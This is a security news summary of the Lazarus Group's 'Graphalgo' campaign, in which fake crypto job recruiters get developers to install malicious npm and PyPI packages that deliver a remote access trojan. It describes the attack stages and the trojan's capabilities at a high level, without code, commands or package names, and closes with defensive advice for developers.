Lazarus Targets Developers with Fake Crypto Jobs
North Korea's Lazarus Group is running a large-scale fake recruitment campaign codenamed "Graphalgo" targeting JavaScript and Python developers with cryptocurrency-related coding challenges. Researchers have discovered 192 malicious packages on npm and PyPI that act as downloaders for a remote access trojan (RAT).
Campaign Overview
| Attribute | Details |
|---|---|
| Campaign Name | Graphalgo |
| Threat Actor | Lazarus Group (North Korea) |
| Target | JavaScript and Python developers |
| Malicious Packages | 192 (npm + PyPI) |
| Lure | Cryptocurrency coding challenges and job interviews |
| Payload | RAT with command execution, process listing, file exfiltration |
| Recruitment Platforms | LinkedIn, Facebook, Reddit |
How the Attack Works
Stage 1: Fake Recruitment
Lazarus operates fake blockchain and cryptocurrency companies that post job offerings on LinkedIn, Facebook, and Reddit. Targets receive messages from "recruiters" offering high-paying positions at these companies.
Stage 2: Coding Challenge
Candidates are asked to complete a cryptocurrency-related coding challenge as part of the "interview process." The challenge requires installing specific npm or PyPI packages as dependencies.
Stage 3: Malicious Packages
The required packages contain hidden malware that acts as a downloader for a RAT. Once installed, the packages:
- Execute a postinstall script that runs silently in the background
- Download a second-stage payload from attacker infrastructure
- Install a RAT capable of arbitrary command execution
RAT Capabilities
| Capability | Description |
|---|---|
| Arbitrary command execution | Run any command on the victim's machine |
| Process listing | Enumerate running processes |
| File exfiltration | Search for and steal files |
| Environment discovery | Collect system and network information |
| Persistence | Maintain access across reboots |
Package Statistics
| Registry | Malicious Packages | Total Downloads |
|---|---|---|
| npm | ~120 packages | Thousands |
| PyPI | ~72 packages | Thousands |
| Total | 192 packages | Under investigation |
Packages used names designed to appear legitimate, mimicking popular cryptocurrency and blockchain libraries with slight name variations (typosquatting).
Developer Protection
- Verify package authenticity — Check publisher reputation, download counts, and creation dates before installing
- Audit dependencies — Use
npm auditandpip-auditto scan for known vulnerabilities - Use lockfiles — Pin exact package versions with
package-lock.jsonandrequirements.txt - Be skeptical of coding challenges requiring unfamiliar packages
- Verify recruiters — Confirm the company and recruiter exist through official channels
- Run challenges in sandboxes — Use containers or VMs for coding challenges from unknown sources
- Monitor for unexpected network activity after installing new packages
Sources
- The Hacker News — Lazarus Campaign Plants Malicious Packages
- BleepingComputer — Fake Recruiters Hide Malware in Coding Challenges
- ReversingLabs — Fake Recruiter Campaign Analysis